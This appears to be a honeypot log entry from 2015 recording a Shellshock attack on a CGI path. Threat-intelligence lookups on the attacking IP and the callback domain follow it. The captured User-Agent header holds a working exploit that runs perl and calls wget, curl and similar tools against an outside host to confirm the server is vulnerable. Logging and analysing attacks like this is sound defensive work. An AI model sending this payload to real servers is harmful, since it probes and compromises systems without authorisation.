Samstag, 24. Oktober 2015

218.94.94.86 - Shellshock perl via http://www.testvc.it/TESTONLY

BEGIN OF HTTP DATA:
2015-10-24 04:41:02
Source IP: 218.94.94.86
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget -O /dev/null http://www.testvc.it/TESTONLY; curl -O /dev/null http://www.testvc.it/TESTONLY; fetch http://www.testvc.it/TESTONLY; GET http://www.testvc.it/TESTONLY; lwp-download http://www.testvc.it/TESTONLY; lynx http://www.testvc.it/TESTONLY");'
Host: 109.234.106.8
Connection: Close

218.94.94[.]86

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/218.94.94.86
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
testvc.it

Registran
Organization:     MADE TO SELL SRL
Address:            VIA VITTORIO EMANUELE 33
                           CALENZANO                   

62.48.49[.]78

    Static Source: GeoIP data
  • Country: Italy
  • ASN: AS13284 Playnet S.R.L.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.48.49.78